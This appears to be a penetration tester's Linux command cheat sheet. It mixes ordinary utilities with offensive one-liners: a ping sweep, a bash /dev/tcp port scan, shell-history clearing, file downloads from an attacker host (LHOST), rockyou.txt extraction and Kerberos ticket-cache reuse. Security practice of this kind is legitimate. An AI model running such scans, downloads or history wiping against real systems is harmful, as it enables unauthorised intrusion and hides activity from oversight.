% linux

# ping sweep host scan /24
for i in {1..255} ;do (ping -c 1 172.16.1.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
for i in {1..255}; do (ping -c 1 <SUBNET_IP>.${i} | grep "bytes from" &); done

# port scan
for i in {1..65535}; do (echo > /dev/tcp/<IP>/$i) >/dev/null 2>&1 && echo $i is open; done

# compile for windows cpp
x86_64-w64-mingw32-g++ your_file.cpp -o output_name.exe

# latest apache access logs
tail -f /var/log/apache2/access.log

# clear history
history -c && history -w
rm ~/.zsh_history

# download wget
wget http://<LHOST>/<DIR>

# download wget rename
wget http://<LHOST>/<DIR> -O <NEWFILE>

# rockyou.txt
sudo tar xvzf /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz -C /usr/share/seclists/Passwords/Leaked-Databases/

# linux kerberos
export KRB5CCNAME=/tmp/krb5cc_minenow

# recursively find string in files
grep -Horni <TEXT> <DIR> 
grep -Hrni <TEXT> <DIR>

# recursively find string; find another string from results
grep -lori <TEXT1> | xargs grep -Horn <TEXT2>

# test reverse ping
sudo tcpdump -i tun0 icmp

# convert xlsx to csv
sudo apt install gnumeric
ssconvert <INPUT>.xlsx <OUTPUT>.csv

# base64 no newline wrap
cat payload.txt | base64 -w 0

# create dummy image
convert -size 100x100 xc:red output.png
convert -size 100x100 gradient:blue-red gradient.png
convert -size 100x100 pattern:checkerboard checker.png

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
